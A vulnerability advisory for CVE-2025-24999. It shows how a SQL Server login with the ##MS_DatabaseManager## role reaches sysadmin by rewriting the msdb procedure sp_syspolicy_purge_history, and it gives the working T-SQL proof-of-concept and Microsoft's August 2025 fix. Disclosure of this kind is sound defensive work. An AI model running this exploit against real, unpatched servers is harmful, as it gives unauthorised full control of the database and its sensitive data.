Title: Microsoft SQL Server Privilege Elevation Through ##MS_DatabaseManager## Role [CVE-2025-24999] Product: Database Manufacturer: Microsoft Affected Version(s): SQL Server 2022,2025 Tested Version(s): SQL Server 2022,2025 Risk Level: High Solution Status: Fixed CVE Reference: CVE-2025-24999 Base Score: 8.8 Author of Advisory: Emad Al-Mousa ***************************************** Introduction: Privilege elevation against database systems represents a critical security threat because the database system stores your organization’s “jewels”…your sensitive data. Once an attacker elevates their account permissions this will enable them to view confidential data, implant malicious code, or cause denial of a service. Unfortunately, SQL Server database technology is prone to privilege elevation attacks, I am documenting all possible attack exploit techniques in this unified article blog reference (and will continue to do so in the future): https://medium.com/@emad.mousa.83/microsoft-sql-server-privilege-escalation-elevation-exploits-proof-of-concpet-80fb1e45699b ***************************************** Proof of Concept (PoC): In this simulation please use SQL Server Management Studio client tool to run the SQL queries. Also, access SQL Server Management Studio with an account granted SYSADMIN role as a DBA. I will create a database login account and will name it “acc2” with the password “acc2” and grant this account the new server role ##MS_DatabaseManager##: USE [master] GO CREATE LOGIN [acc2] WITH PASSWORD=N'acc2', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF GO ALTER SERVER ROLE [##MS_DatabaseManager##] ADD MEMBER [acc2] GO When accessing with the database login “acc2” you can perform create,aleter,drop any database in the SQL Server Instance as expected. To Verify This, execute the following sql query as account “acc2”: select SUSER_NAME() as Myname,* from sys.fn_my_permissions(NULL,NULL); GO Now, the “exploit” part of the security vulnerability to escalate to SYSADMIN. Right click on the MSDB database and choose “New Query”: Then run the following SQL code that will modify a system stored procedure sp_syspolicy_purge_history code to grant acc2 account SYSADMIN role: ALTER PROCEDURE [dbo].[sp_syspolicy_purge_history] AS BEGIN ALTER SERVER ROLE [sysadmin] ADD MEMBER [acc2] END Which consequently will elevate my permission to sysadmin role when the standard and default job syspolicy_purge_history gets executed as scheduled. The job syspolicy_purge_history exists in ALL instillations of SQL Server database engines by default. For the sake of simulation in your SQL Server Management Studio with account granted SYSADMIN role (your DBA ccount) run the job manually and after that refresh your database connection of acc2 account….you will see that you are now granted SYSADMIN ROLE !! After applying security update released in August 2025 KB5063756, Microsoft fix was to use certificate based account (with low-permission) and change the job T-SQL execution code as follows: EXECUTE AS LOGIN = '##MS_PolicyTsqlExecutionLogin##' WITH NO REVERT; EXEC msdb.dbo.sp_syspolicy_purge_history So, even if the procedure code is changed….it will run wit the power of the low-permission certificate account ##MS_PolicyTsqlExecutionLogin## ***************************************** * Remarks and Conclusions: - clear steps of exploit and further analysis , and attack methods are documented here: https://databasesecurityninja.wordpress.com/2026/04/02/microsoft-sql-server-privilege-elevation-through-ms_databasemanager-role-cve-2025-24999/ - ##MS_DatabaseManager## Server Level Role can still be abused for privilege elevation, so you will need to implement defence in-depth tactics for protection. ***************************************** References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24999 https://nvd.nist.gov/vuln/detail/CVE-2025-24999 https://databasesecurityninja.wordpress.com/2026/04/02/microsoft-sql-server-privilege-elevation-through-ms_databasemanager-role-cve-2025-24999/ https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/server-level-roles?view=sql-server-ver17